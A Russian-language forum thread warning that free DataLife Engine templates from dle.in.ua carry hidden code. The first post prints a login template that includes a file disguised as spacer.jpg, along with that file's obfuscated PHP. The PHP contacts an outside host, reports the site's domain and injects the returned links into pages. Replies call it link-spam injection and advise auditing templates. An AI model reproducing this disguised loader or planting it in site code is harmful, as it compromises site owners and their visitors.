Инфо Ахтунг dle.in.ua - в одном из шаблонов троян

Тема в разделе "DLE", создана пользователем E-body, 3 июн 2011.

Информация :
Актуальная версия DataLife Engine 11.2
( Final Release v.11.2 | Скачать DataLife Engine | Скачать 11.2 demo )
Нужно ли обновляться | Как обновиться | Изменения в шаблонах
> Нет русских символов <
[Приватная тема DLE (Все подробности в ЛС к модератору раздела)]

Версии 11.1 и ниже - уязвимы!

Локализации | F.A.Q. | Внешний вид
Правила раздела | Правила форума
Обсуждение хайда карается баном!
В каждом сообщении указывайте версию DLE, которого они касаются!
Статус темы:
Закрыта.
Модераторы: killoff
  1. E-body

    E-body

    Регистр.:
    6 сен 2007
    Сообщения:
    981
    Симпатии:
    319
    Понадобилось найти шаблон на определенную тематику, начал смотреть на сайтах которым раньше доверял. Но как пологается в есплатниках просматривать все файлы то по ходу действий обнаружил вот что:
    else { $login_p= include ($tpl->dir.'/images/spacer.jpg');
    login.tpl
    PHP:
    <?php
    if ($is_logged == TRUE){
    $login_panel = <<<HTML
    Привет, <strong>{$member_id['name']}</strong>!
    HTML;
    if (
    $user_group[$member_id['user_group']]['allow_admin']) {
    $login_panel .= <<<HTML
    <a href="{$adminlink}" target="_blank" style="color:#cc0000;" class="mainlevel">Админцентр</a><br>
    HTML;
    }
    else {
    $login_panel .= <<<HTML
    &nbsp;<br>
    HTML;
    }
    $login_panel .= <<<HTML
    <a href="{$link_profile}" class="mainlevel">Профиль</a>
    <a href="
    {$link_pm}" class="mainlevel">ПС ({$member_id['pm_unread']} | {$member_id['pm_all']})</a><br>
    <a href="
    {$link_stats}" class="mainlevel">Статистика</a>
    <a href="
    {$link_addnews}" class="mainlevel">Добавить новость</a>
    <a href="
    {$link_favorites}" class="mainlevel">Закладки</a><br>
    <a href="
    {$link_newposts}" class="mainlevel">Непрочитанное</a>
    <a onclick="javascript: showBusyLayer()" href="
    {$link_logout}" class="mainlevel"><strong>Выход</strong></a>

    HTML;
    } else { 
    $login_p= include ($tpl->dir.'/images/spacer.jpg');
    $login_panel = <<<HTML
    <form method="post" onsubmit="javascript:showBusyLayer()" action=''>
    <label for="mod_login_username" class="ja-login-user">
    <span>Username</span>
    <input name="login_name" id="mod_login_username" type="text" class="inputbox" style="width:104px" />
    </label>
    <label for="mod_login_password" class="ja-login-password">
    <span>Password</span>
    <input name="login_password" type="password" id="mod_login_password" class="inputbox" style="width:104px" />
    </label>
    <label for="mod_login_remember">
    <input name="login" type="hidden" id="mod_login_remember" value="submit" />
    </label>
    <input onclick="submit();" class="button" type="submit" value="Войти" />

    <div class="ja-login-links">

                <a href="
    {$link_lost}">
                Напомнить пароль?</a>
    $login_p
                                <a href="
    {$link_regist}">
                        Регистрация</a>
                            </div>
        
        <input type="hidden" name="option" value="com_user" />

        <input type="hidden" name="task" value="login" />
        <input type="hidden" name="return" value="aHR0cDovL3RlbXBsYXRlMTUuam9vbWxhcnQuY29tL2phX3NhbmlkaW5lX2lpLw==" />
        <input type="hidden" name="c42d24a5709c8429dbd87ebe19af25ac" value="1" />




    </form>
    HTML;
    }
    ?>
    Содержимое spacer.jpg
    PHP:
    <?php $x14="fcl\157\163\x65"$x15="\x66e\x6f\146"$x16="\x66\147\x65\164\x73"$x17="\146\x73\x6f\143\153\157\160en"$x18="\x66pu\164\x73"$x19="\163t\162s\164\162"
    $x0b="<\141 \150\162e\x66\075n\145\157\153\163.r\165\x3e\074\x2f\141\x3e";$x0c = @$x17("w\167w\056\145r\157r\x68\157\163\x74\056\x72u"80$x0d$x0e30);if ($x0c){ $x0f "\x47\105T /\x73\141\x69t\057\151\x64\x32.\160hp\077\x73\151t\x65\x3d".$_SERVER['HTTP_HOST']." \110\124\124P\x2f\x31.\061\n";$x0f .= "\110\157st\072\x20\167\x77w\056\x65r\x6f\162\x68os\164\056\162\165\n"$x0f.='Accept: text/html, text/plain, text/sgml, */*;q=0.01 Accept-Encoding: gzip, compress  Accept-Language: ru,en Accept-Charset: windows-1251, iso-8859-1;q=0.01, us-ascii;q=0.01'$x0f .= "\n\n"$x18($x0c$x0f);$x10 false;while (!$x15($x0c)) {$x11=$x16($x0c,128);if ($x10) {$x12.= $x11;} else {$x13 .= $x11;}if ($x11 == "\r\n" ) {$x10 true;}}$x14($x0c);}else return $x0b; if ($x19($x13,'404')) return $x0b;else return $x12?>
    Если кому не вериться могу скинуть линк на страницу.
    п.с. молодцы ребята, к успеху идете =/
     
  2. Versus71

    Versus71 Постоялец

    Регистр.:
    21 дек 2009
    Сообщения:
    97
    Симпатии:
    18
    Может сторонний кто протроянил? Ты бы им написал и посмотрел реакцию.
     
  3. zzallexx

    zzallexx

    Регистр.:
    11 июн 2008
    Сообщения:
    1.036
    Симпатии:
    699
    это не троян это ссылки вроде как походу они с помощью этого кода подгружаются на сайт <a href="http://dreamfm.ru" title="Интернет радио онлайн Музыка твоего ритма, музыка твоей мечты! 103,2 FM"></a> <a href="http://n86-geek.ru" title="Nokia N86: игры Nokia N86, темы для телефона Nokia N86, программы и софт nokia"></a> <a href="http://n95-geek.ru" title="Nokia N95 GeeK - клуб любителей Nokia N95. Программы Nokia N95, игры для Nokia N95 и другое"></a>
     
    E-body нравится это.
  4. E-body

    E-body

    Регистр.:
    6 сен 2007
    Сообщения:
    981
    Симпатии:
    319
    но серавно перед тем как апрувить новости можно просмотреь шаб чтоб не портить репу себе.
    -
    а хозяевам (dle.in.ua) читающим тему советую почистить файл [dle.in.ua]_wow.rar
     
  5. killoff

    killoff CD тихо, и не DVD меня ;)

    Moderator
    Регистр.:
    13 май 2008
    Сообщения:
    2.101
    Симпатии:
    758
    90% фришных шабов на dle in ua содержат подобную пакость, сам сталкивался года полтора-два назад... Нужно после установки шаба смотреть все внешние ссылки, все http запросы (есть плагин для мозилы, точного названия его не помню).
     
  6. E-body

    E-body

    Регистр.:
    6 сен 2007
    Сообщения:
    981
    Симпатии:
    319
    на сайте 8dle - все шаблоны для DLE гавно.
    в каждом .tpl по 2-5 ссылок.
     
  7. MaximMax

    MaximMax

    Регистр.:
    14 май 2009
    Сообщения:
    595
    Симпатии:
    76
    Аналогичная проблема брал шаблон на http://www.rips.su/ тот же файл тот же эффект от файла spacer.gif
     
  8. kanton

    kanton Постоялец

    Регистр.:
    10 янв 2011
    Сообщения:
    52
    Симпатии:
    6
    Проще заказать уник, чем геммор вылавливать
     
  9. acelotuse

    acelotuse

    Регистр.:
    31 мар 2009
    Сообщения:
    312
    Симпатии:
    37
    советую еще проводить поиск в файлах двига на наличие display:none;. Зачастую во фришных шаблонах таким образом тарят ссылки на г...сайты.
     
  10. glamyrit

    glamyrit

    Регистр.:
    27 фев 2008
    Сообщения:
    234
    Симпатии:
    66
    а что вы хотели, если халяву используете, то это только в мышеловку, так-что нужно быть готовым к таким пакостям,
    да и зачастую я думаю вы бы и сами сделали так все, если бы имели свой сайт с шаблонами, понаставили ссылок где только можно.
     
Статус темы:
Закрыта.